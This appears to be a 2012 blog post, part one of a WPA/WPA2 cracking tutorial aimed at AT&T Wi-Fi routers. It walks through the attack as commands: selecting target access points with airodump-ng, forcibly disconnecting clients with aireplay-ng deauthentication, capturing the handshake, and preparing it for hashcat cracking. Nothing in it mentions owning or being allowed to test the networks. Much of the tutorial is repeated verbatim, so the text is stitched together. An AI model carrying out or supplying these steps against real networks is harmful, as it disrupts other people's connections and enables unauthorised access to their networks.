PART 1: Cracking AT&T WPA1/2
Monday, September 24, 2012
Part 1. Getting the handshake.
Aircrack's site has a pretty good tutorial.
Boot from Back Track 5 R3
First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.
You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.
Once you find a couple targets on the same channel. You need to close airodump and stop airmon
#airmon-zc stop mon0
Start airmon-zc on the channel of the target.
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>
Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP. Airodump should show in the top right hand corner once you get a handshake.
Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.
#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.
#pyrit -r FILENAME.pcap analyze
The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.
To strip out all the crap out of your pcap file expect for your handshakes run the following:
#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip
To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.
Aircrack's site has a pretty good tutorial.
Boot from Back Track 5 R3
First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.
#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.
Once you find a couple targets on the same channel. You need to close airodump and stop airmon
#airmon-zc stop mon0
Start airmon-zc on the channel of the target.
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>
Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP. Airodump should show in the top right hand corner once you get a handshake.
Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.
#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Where:
- -0 means deauthentication
- 5 is the number of deauths to send
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
- mon0 is the interface name
If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.
#pyrit -r FILENAME.pcap analyze
The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.
To strip out all the crap out of your pcap file expect for your handshakes run the following:
#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip
To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.